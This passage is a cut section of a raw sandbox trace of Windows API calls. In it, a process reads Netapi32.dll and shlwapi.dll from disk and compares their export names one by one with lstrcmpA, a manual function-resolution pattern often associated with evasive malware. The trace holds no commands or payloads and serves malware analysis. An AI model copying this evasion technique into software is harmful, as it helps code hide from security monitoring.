lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0289.955] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0289.955] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0289.955] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0289.955] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0289.955] GetProcessHeap () returned 0x540000 [0289.955] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13b00) returned 0x2d45030 [0289.955] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0289.955] ReadFile (in: hFile=0x17c, lpBuffer=0x2d45030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d45030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0289.955] CloseHandle (hObject=0x17c) returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0289.956] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0289.957] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0289.958] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0289.959] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0289.960] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0289.960] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0289.960] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0289.960] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0289.960] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0289.960] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0289.960] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0289.960] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0289.961] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0289.961] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0289.962] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0289.963] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0289.964] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0289.964] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0289.968] GetProcessHeap () returned 0x540000 [0289.968] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x540000) returned 1 [0289.968] GetProcessHeap () returned 0x540000 [0289.968] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x559060 [0289.968] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0289.968] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0289.968] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0289.968] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0289.969] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0289.969] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0289.969] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0289.969] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0289.969] GetProcessHeap () returned 0x540000 [0289.969] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x51148) returned 0x2d45030 [0289.970] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0289.970] ReadFile (in: hFile=0x17c, lpBuffer=0x2d45030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d45030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0289.974] CloseHandle (hObject=0x17c) returned 1 [0289.974] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0289.974] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0289.974] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0289.974] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0289.974] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0289.974] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0289.975] lstrcmpA (lpString1="AssocQueryKeyA", 